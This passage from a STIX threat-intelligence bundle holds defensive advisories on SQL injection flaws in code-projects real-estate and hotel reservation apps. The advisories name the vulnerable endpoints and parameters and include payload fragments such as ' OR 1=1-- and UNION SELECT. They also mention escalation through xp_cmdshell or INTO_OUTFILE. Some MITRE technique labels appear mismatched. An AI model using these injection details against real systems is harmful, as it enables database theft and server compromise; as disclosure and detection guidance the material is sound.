detect and block SQL injection payloads targeting the `/edit_room.php` endpoint, referencing the techniques described in the attack chain.\n*   Review webserver access logs for anomalous requests to `/edit_room.php` containing SQLi patterns as described in the detection rule, even if no patch is immediately available.\n",
      "published": "2026-07-05T21:25:11Z",
      "labels": [
        "sql-injection",
        "vulnerability",
        "web-application",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14770"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/orionyan520/cve_report/issues/3"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14770"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376360"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376360/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4c657edb-fbe7-58b3-afb8-013dba06c7b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://code-projects.org/",
      "pattern": "[url:value = 'https://code-projects.org/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T21:24:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d8c88ed-4891-5066-8636-a91a66a27df9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--857ce44e-c4ee-53d2-9904-d03cee22c969",
      "target_ref": "indicator--4c657edb-fbe7-58b3-afb8-013dba06c7b6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f2a6a353-9351-5867-8d25-b008541e653e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/6Justdododo6/CVE/issues/28",
      "pattern": "[url:value = 'https://github.com/6Justdododo6/CVE/issues/28']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T21:24:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3e532e7d-15a8-5706-a002-98c1fd25542e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--857ce44e-c4ee-53d2-9904-d03cee22c969",
      "target_ref": "indicator--f2a6a353-9351-5867-8d25-b008541e653e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--367d6443-06a2-5279-b413-36a8055ffe51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14769",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14769']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T21:24:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1ea79300-af2d-5ee5-8519-fa9830c8f935",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--857ce44e-c4ee-53d2-9904-d03cee22c969",
      "target_ref": "indicator--367d6443-06a2-5279-b413-36a8055ffe51"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--69a48dad-ba96-50eb-a3d2-a4673ec16873",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/849374",
      "pattern": "[url:value = 'https://vuldb.com/submit/849374']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T21:24:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--028383b3-64c2-5f28-80e3-381e73aa739c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--857ce44e-c4ee-53d2-9904-d03cee22c969",
      "target_ref": "indicator--69a48dad-ba96-50eb-a3d2-a4673ec16873"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--86319f3e-79fb-5655-b4bb-5cfdc48ba14d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376359",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376359']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T21:24:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a959ea9e-c6c8-544c-992d-07c544c6e016",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--857ce44e-c4ee-53d2-9904-d03cee22c969",
      "target_ref": "indicator--86319f3e-79fb-5655-b4bb-5cfdc48ba14d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b7da4bf3-c760-5c58-a58a-dd5bb6ce05e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376359/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376359/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T21:24:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d77e46b6-f459-5d2b-a663-5093ab75c685",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--857ce44e-c4ee-53d2-9904-d03cee22c969",
      "target_ref": "indicator--b7da4bf3-c760-5c58-a58a-dd5bb6ce05e2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5308b33c-0dc5-5745-8fdb-adb9d137d75b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--857ce44e-c4ee-53d2-9904-d03cee22c969",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Information Repositories",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1213",
          "url": "https://attack.mitre.org/techniques/T1213"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e23cdd13-ce30-5aac-995b-919e0129e0f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--857ce44e-c4ee-53d2-9904-d03cee22c969",
      "target_ref": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--34fdfe50-f127-5738-b060-e32f684577d7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--857ce44e-c4ee-53d2-9904-d03cee22c969",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--857ce44e-c4ee-53d2-9904-d03cee22c969",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14769 — SQL Injection in code-projects Real State Services 1.0",
      "description": "## Overview\n\nA significant security vulnerability, CVE-2026-14769, has been identified in version 1.0 of the code-projects Real State Services application. This flaw specifically affects the `/pay.php` endpoint, where inadequate sanitization of the `Bankname` argument permits remote SQL Injection. The exploit for this vulnerability has been publicly disclosed and is actively available, increasing the risk of widespread exploitation. Successful attacks could lead to unauthorized access to the application's underlying database, potentially compromising sensitive information, corrupting data, or impacting the availability of the service. Defenders should prioritize patching and implement robust input validation to mitigate the threat posed by this easily exploitable vulnerability.\n\n## Attack Chain\n\n1.  An unauthenticated attacker sends a specially crafted HTTP POST or GET request to the `/pay.php` endpoint of the vulnerable code-projects Real State Services 1.0 application.\n2.  The request includes malicious SQL injection payloads embedded within the `Bankname` argument, designed to manipulate the application's database queries.\n3.  The application, lacking proper input validation and sanitization for the `Bankname` parameter, directly incorporates the attacker-supplied malicious string into its backend SQL query.\n4.  This improper handling results in a classic SQL Injection vulnerability, allowing the attacker to execute arbitrary SQL commands on the application's database.\n5.  Depending on the database permissions and attacker's objectives, this can lead to unauthorized information disclosure (e.g., retrieving sensitive user data, credentials, or system configurations).\n6.  The attacker may also be able to modify, insert, or delete data within the database, causing data integrity issues or service disruption.\n7.  In some configurations, successful SQL Injection can be escalated to arbitrary command execution on the underlying server, providing the attacker with full system control.\n8.  The ultimate objective could be data exfiltration, defacement, or further lateral movement within the compromised environment.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14769 grants an attacker unauthorized control over the application's database. This directly translates to a high risk of sensitive data exposure, including user credentials, financial records, or other proprietary business information. Beyond confidentiality impact, attackers can tamper with database records, leading to data integrity issues that can disrupt business operations, degrade service quality, or facilitate further fraudulent activities. While the CVSS score indicates low impact on Confidentiality, Integrity, and Availability, the nature of SQL Injection, especially with publicly available exploits, often leads to severe consequences for affected organizations across various sectors.\n\n## Recommendation\n\n*   **Patch Immediately**: Apply any available patches or updates from code-projects for Real State Services 1.0 to address CVE-2026-14769.\n*   **Deploy WAF**: Implement or update Web Application Firewall (WAF) rules to detect and block common SQL injection patterns targeting the `/pay.php` endpoint and the `Bankname` argument, leveraging the patterns defined in the Sigma rule below.\n*   **Input Validation**: Review and enhance application-level input validation on all user-supplied data, especially the `Bankname` parameter within `/pay.php`, to prevent SQL injection.\n*   **Deploy Sigma Rules**: Deploy the provided Sigma rule \"Detects CVE-2026-14769 Exploitation — SQL Injection via /pay.php Bankname Argument\" to your SIEM and tune for your environment, focusing on webserver logs.\n",
      "published": "2026-07-05T21:24:19Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "cve",
        "data-exfiltration"
      ],
      "object_refs": [
        "indicator--4c657edb-fbe7-58b3-afb8-013dba06c7b6",
        "indicator--f2a6a353-9351-5867-8d25-b008541e653e",
        "indicator--367d6443-06a2-5279-b413-36a8055ffe51",
        "indicator--69a48dad-ba96-50eb-a3d2-a4673ec16873",
        "indicator--86319f3e-79fb-5655-b4bb-5cfdc48ba14d",
        "indicator--b7da4bf3-c760-5c58-a58a-dd5bb6ce05e2",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14769"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/6Justdododo6/CVE/issues/28"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14769"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/849374"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376359"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376359/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d9640da2-fb64-5981-9016-fe202dc6506f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0c36e6dd-7a4a-5413-8a25-8d4da44b7939",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0c36e6dd-7a4a-5413-8a25-8d4da44b7939",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14768: Remote SQL Injection in code-projects Real State Services 1.0",
      "description": "## Overview\n\nA critical remote SQL injection vulnerability, tracked as CVE-2026-14768, has been discovered in version 1.0 of the code-projects Real State Services application. This flaw specifically affects the `/builderHome.php` file, where improper sanitization of the `loc` argument allows unauthenticated attackers to inject malicious SQL queries. This vulnerability can be exploited remotely, leading to unauthorized access to the underlying database, data exfiltration, data manipulation, or potentially further system compromise. The CVSS v3.1 Base Score is 7.3 (High), and a public exploit for this vulnerability is currently available, significantly increasing the risk of widespread exploitation by various threat actors. Organizations utilizing code-projects Real State Services 1.0 should consider immediate remediation due to the ease of exploitation and potential impact.\n\n## Attack Chain\n\n1.  An unauthenticated attacker crafts a malicious HTTP GET or POST request targeting the `/builderHome.php` endpoint of the vulnerable Real State Services application.\n2.  The attacker embeds SQL injection payloads within the `loc` argument of the HTTP request, designed to bypass input validation.\n3.  The vulnerable application processes the unsanitized `loc` argument directly within a backend SQL query.\n4.  The injected SQL commands are executed by the application's database, allowing the attacker to interact with the database beyond legitimate access.\n5.  This enables the attacker to perform actions such as retrieving sensitive information (e.g., user credentials, property listings), modifying database contents, or executing arbitrary commands on the host server if the database configuration permits (e.g., via `xp_cmdshell` or `LOAD_FILE/INTO_OUTFILE`).\n6.  The attacker achieves unauthorized access to the application's backend data or gains further control over the hosting server, leading to data compromise or system takeover.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14768 grants attackers full control over the application's database. This can lead to severe consequences, including the exfiltration of sensitive real estate data, customer information, or administrative credentials. Data integrity could be compromised through unauthorized modification or deletion of records. Given the public availability of an exploit, organizations running code-projects Real State Services 1.0 face an immediate and elevated risk of data breaches, reputational damage, and potential regulatory fines. The impact on victims could range from unauthorized access to critical business information to complete compromise of the underlying server infrastructure.\n\n## Recommendation\n\n*   Immediately apply any available patches or security updates for code-projects Real State Services 1.0 to address CVE-2026-14768.\n*   Deploy the `Detect CVE-2026-14768 Exploitation - Real State Services SQLi` Sigma rule to your SIEM to detect attempted exploitation of this vulnerability.\n*   Implement or strengthen Web Application Firewall (WAF) rules to detect and block common SQL injection patterns and anomalous requests targeting `/builderHome.php`.\n*   Enable comprehensive web server logging and regularly review logs for suspicious HTTP requests containing SQL injection payloads, especially those targeting `/builderHome.php` with the `loc` argument.\n",
      "published": "2026-07-05T20:23:33Z",
      "labels": [
        "web-vulnerability",
        "sql-injection",
        "php",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14768"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--63fe273f-6934-56f9-bfab-9b84faf8d817",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--64b63138-d4a7-554e-b7de-5a586fd2463d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cf40195c-d099-59cf-b2da-cb74d173bef9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--64b63138-d4a7-554e-b7de-5a586fd2463d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--78ff6bb6-3331-5325-a7bb-c0d7ef6af050",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--64b63138-d4a7-554e-b7de-5a586fd2463d",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--64b63138-d4a7-554e-b7de-5a586fd2463d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14764: SQL Injection in code-projects Hotel and Tourism Reservation",
      "description": "## Overview\n\nA critical SQL injection vulnerability, tracked as CVE-2026-14764, has been identified in code-projects Hotel and Tourism Reservation version 1.0. This flaw, discovered in the 'Event Management Page' component, specifically affects the `/admin/add_event.php` file where the `fdetails` argument is susceptible to improper neutralization of special elements. Attackers can remotely manipulate this argument to inject malicious SQL queries, leading to data compromise. The vulnerability has been publicly disclosed, with exploit details available, significantly increasing the likelihood of active exploitation against unpatched systems running this software. Organizations utilizing code-projects Hotel and Tourism Reservation 1.0 are strongly advised to implement mitigations immediately to prevent unauthorized access and data breaches.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies an internet-facing instance of code-projects Hotel and Tourism Reservation 1.0.\n2.  The attacker crafts a malicious HTTP POST or GET request targeting the `/admin/add_event.php` endpoint.\n3.  The attacker injects SQL payloads into the `fdetails` argument, which is processed by the vulnerable application.\n4.  The application processes the request without properly sanitizing the input, leading to the execution of the attacker's SQL queries.\n5.  The malicious SQL query allows the attacker to read, modify, or delete database content, potentially extracting sensitive information or altering application behavior.\n6.  The attacker successfully compromises the underlying database, gaining unauthorized access to user credentials, booking details, or other critical data.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14764 can lead to significant data compromise, including the exfiltration of sensitive customer information, booking data, and administrative credentials stored in the application's database. This can result in reputational damage, regulatory penalties, and further attacks against affected entities. Given that exploit details have been publicly disclosed, unpatched systems face an immediate and elevated risk of being targeted by malicious actors seeking to leverage this vulnerability for financial gain or disruptive purposes.\n\n## Recommendation\n\n*   Prioritize patching or upgrading code-projects Hotel and Tourism Reservation to a version that addresses CVE-2026-14764, once available from the vendor.\n*   Deploy the Sigma rule provided in this brief to your SIEM to detect exploitation attempts of CVE-2026-14764 against your web servers.\n*   Implement a Web Application Firewall (WAF) in front of the vulnerable application to detect and block malicious HTTP requests containing SQL injection payloads, specifically targeting `cs-uri-stem: \"/admin/add_event.php\"` and the `fdetails` parameter.\n*   Enable detailed webserver access logging (e.g., Apache, Nginx, IIS) to capture `cs-uri-stem`, `cs-uri-query`, and HTTP method, essential for forensic analysis and detection.\n",
      "published": "2026-07-05T17:23:25Z",
      "labels": [
        "web-vulnerability",
        "sql-injection",
        "cve",
        "data-compromise",
        "webserver"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14764"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://raw.githubusercontent.com/anubhavv106/Security-Advisories/refs/heads/main/Hotel-Tourism-Reservation-add_event.php_SQLi.md"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14764"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/850582"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376353"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376353/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--351df6d5-76c3-57bb-8694-35ff5f4b9f26",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://code-projects.org/",
      "pattern": "[url:value = 'https://code-projects.org/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T17:22:25Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--37573dae-cada-5a1d-871f-eafa0d142d27",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--68a20c90-6cc0-5649-87af-1479040516f5",
      "target_ref": "indicator--351df6d5-76c3-57bb-8694-35ff5f4b9f26"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1057f764-0025-50f0-9263-6500f8f940bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://raw.githubusercontent.com/anubhavv106/Security-Advisories/refs/heads/main/Hotel-Tourism-Reservation-tour_reserves.php-SQLi.md",
      "pattern": "[url:value = 'https://raw.githubusercontent.com/anubhavv106/Security-Advisories/refs/heads/main/Hotel-Tourism-Reservation-tour_reserves.php-SQLi.md']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T17:22:25Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebcb0cc1-dd19-5c9e-b830-8c69ea2353da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--68a20c90-6cc0-5649-87af-1479040516f5",
      "target_ref": "indicator--1057f764-0025-50f0-9263-6500f8f940bb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--449b0b97-151a-528b-97bd-c6f252791166",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14763",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14763']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T17:22:25Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--04d7acb5-4e44-59fc-872c-971e6f05f55f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--68a20c90-6cc0-5649-87af-1479040516f5",
      "target_ref": "indicator--449b0b97-151a-528b-97bd-c6f252791166"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fcd59346-ed0d-58a6-baaf-2e1335b6fe94",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/850581",
      "pattern": "[url:value = 'https://vuldb.com/submit/850581']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T17:22:25Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c5120e71-bc85-5b09-8900-dbb461671842",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--68a20c90-6cc0-5649-87af-1479040516f5",
      "target_ref": "indicator--fcd59346-ed0d-58a6-baaf-2e1335b6fe94"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b24c5613-ea48-5668-b17a-d18e6c360d6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376352",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376352']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T17:22:25Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5a3cb212-ee95-5b88-a7ed-f562219690f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--68a20c90-6cc0-5649-87af-1479040516f5",
      "target_ref": "indicator--b24c5613-ea48-5668-b17a-d18e6c360d6a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cbc483e8-9271-557a-af17-88727d3e3c66",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376352/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376352/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T17:22:25Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--85ec3fa1-4e8e-5c4c-8b9b-d07d5123502d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--68a20c90-6cc0-5649-87af-1479040516f5",
      "target_ref": "indicator--cbc483e8-9271-557a-af17-88727d3e3c66"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b4ba5c07-f093-5013-a375-0edf64a18a70",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--68a20c90-6cc0-5649-87af-1479040516f5",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1561",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1561",
          "url": "https://attack.mitre.org/techniques/T1561"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6211e61c-fcae-5fe7-bc55-b94722ed204e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--68a20c90-6cc0-5649-87af-1479040516f5",
      "target_ref": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--68a20c90-6cc0-5649-87af-1479040516f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14763: SQL Injection in code-projects Hotel and Tourism Reservation",
      "description": "## Overview\n\nA critical SQL injection vulnerability, identified as CVE-2026-14763, exists in version 1.0 of the code-projects Hotel and Tourism Reservation software. This flaw specifically impacts the \"Tour Reservations Page\" component, residing within the `/admin/tour_reserves.php` file. Attackers can remotely exploit this vulnerability by manipulating the `tour` argument in HTTP GET requests, which is then improperly handled, leading to the execution of arbitrary SQL commands. The vulnerability has been assigned a CVSS v3.1 base score of 7.3 (High). A public exploit has been published and may be used, indicating a heightened risk of active exploitation against unpatched systems. Organizations utilizing this reservation system are strongly advised to take immediate action to mitigate the risk of data compromise and unauthorized access.\n\n## Attack Chain\n\n1. An attacker identifies a publicly accessible instance of `code-projects Hotel and Tourism Reservation 1.0`.\n2. The attacker crafts a malicious HTTP GET request targeting the vulnerable endpoint `/admin/tour_reserves.php`.\n3. This request includes specially crafted SQL injection payloads embedded within the `tour` argument (e.g., `' OR 1=1--`, `UNION SELECT`).\n4. The `Hotel and Tourism Reservation` web application receives the request and processes the `tour` argument without adequate input sanitization.\n5. The malicious input is directly concatenated into a backend SQL query, causing the database to execute the 